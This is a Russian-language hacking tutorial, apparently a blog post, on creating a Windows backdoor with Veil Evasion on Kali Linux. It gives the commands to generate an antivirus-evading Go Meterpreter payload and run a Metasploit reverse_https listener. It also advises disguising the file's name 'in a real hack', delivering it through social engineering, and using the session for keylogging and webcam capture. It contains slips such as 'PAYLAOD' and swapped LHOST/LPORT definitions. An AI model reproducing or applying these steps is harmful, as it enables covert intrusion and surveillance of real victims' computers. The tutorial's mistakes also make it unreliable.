В этой статье мы с вами рассмотрим один из способов создания вируса с помощью инструмента Veil на Kali Linux.
Всем салют, дорогие друзья! Работа с различными вредоносными файлами — это область в которой должны обязательно разбираться хакеры. Я уже много раз рассказывал об инструментах создания вирусов для различных операционных систем. В этой статье продолжим изучать тему малвари и рассмотрим еще один способ создания вируса бэкдор с помощью инструмента Veil на Kali Linux (или любом другом дистрибутиве Linux).
Как создать вирус для Windows с помощью Veil на Kali Linux
Backdoor – это метод, используемый для обхода требований аутентификации или шифрования и создания секретного доступа к компьютеру с целью управления устройством без ведома пользователя. Когда этот термин применяется к вредоносному ПО, это означает, что хакеры используют его для доступа к функциям компьютера в скрытом виде, например, в фоновом режиме.
Далее я покажу, процесс создания бэкдора для компьютера под управление Windows, запуск и работу которого не смог обнаружить даже антивирус. После запуска вируса я смог удаленно управлять компьютером, делать снимки с вебки, скрины, использовать кейлоггер (запись нажатий клавиатуры) и многое другое.
Давайте рассмотрим шаги для создания вируса...
1. Установка Veil на Linux
Первым шагом будет установка Veil. Если вы используете отличный от Kali Linux дистрибутив, тогда нужно также установить Metasploit.
Для быстрой и тихой установки Veil на Kali Linux используем следующую команду:
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
2. Использование фреймворка Veil
После установки для запуска фреймворка, используем команду:
veil
Фреймворк Veil состоит из двух инструментов Evasion и Ordinance, которые можно отобразить командой:
list
Нас же интересует Evasion, поэтому вводим:
use 1
2.1 Создание исполняемого файла вируса
В вирусах типа бэкдор создается обратное соединение. Когда целевой пользователь запускает вредоносный файл вируса, компьютер пытается соединиться с компьютером хакера. Этот процесс называется «бэкконнект». Атака идет изнутри, поэтому антивирусы не всегда могут обнаружить подобную атаку. По этой причине лучше использовать порт 8080 — это обычным порт используемый для подключения к сайтам.
Для отображения списка полезных нагрузок (вирусов), используем команду:
list
Я буду использовать 15-й вариант. Эта опция, в качестве языка программирования, полезной нагрузки Meterpreter использует golang:
use 15
Для создания вируса нужно задать параметры LPORT и LHOST.
LPORT — IP-адрес атакующего компьютера. Чтобы узнать свой IP-адрес, используйте команду ifconfig.
LHOST — порт для подключения. Я буду использовать 8080, но вы можете выбрать другой порт.
set LHOST ваш_ip
set LPORT 8080
Сигнатурный анализ антивируса основан на поиске в файлах уникальной последовательности байтов — сигнатуры, характерной для определенного вируса. Для каждого нового вируса определяется его сигнатура. Полученные данные помещают в базу данных вирусных сигнатур, с которой работают все антивирусы.
Если сигнатура вашего вредоносного файла присутствует в этой базе, антивирус пометит ваш файл как подозрительный. Поэтому рекомендуется использовать обновленную версию Veil, так как обновленная версия лучше справится с маскировкой вируса и позволит обойти антивирус.
Следующие настройки я использовал для обхода антивируса. Это не обязательная часть, но лишняя защита вредоноса не помешает:
Для создания вируса выполняем команду:
generate
Дайте имя файлу. Я назвал его backdoor_8080, но в реальном взломе, чтобы он не вызывал подозрений, вы должны назвать его иначе:
Созданный вирус будет сохранен в каталоге:
var/lib/veil/output/compiled/
2.2 Подключение к удаленному компьютеру
Теперь запустим фреймворк Metasploit. Чтобы запустить Metasploit, откройте терминал и выполните команду:
msfconsole
Выбираем модуль multi/handler:
use exploit/multi/handler
Отобразим параметры:
show options
Изменим параметры в соответствии с нашими требованиями. Выполним следующие команды:
set PAYLAOD windows/meterpreter/reverse_https
set LHOST IP
set LPORT 8080
show options
IP — это IP-адрес нашего компьютера, который мы использовали во время создания вируса.
Запускаем слушатель:
exploit
2.3 Доставка вируса на целевой компьютер
Теперь можно отправить вирус на целевой компьютер. Если у вас есть нет физического доступа к устройству, тогда можете применить методы социальной инженерии.
2.4 Тестирование вируса на Windows
Запускаем вирус на компьютере Windows (в моем случае — файл backdoor_8080.exe).
Возвращаемся в Metasploit и видим, что открыта сессия metepreter. А значит мы взломали удаленный компьютер и можем с ним взаимодействовать:
Сессия Meterpreter будет выглядеть так, как показано выше. Чтобы получить справку по командам, введите:
help
Теперь можно изменять привилегии пользователя, скачивать и заливать файлы, запускать исполняемый файл как службу, делать снимки экрана, сохранять нажатия клавиш и многое другое.
Данный способ можно использовать в локальной сети. Если вы хотите использовать удаленно, тогда необходимо настроить удаленное соединение с помощью Ngrok.
コメント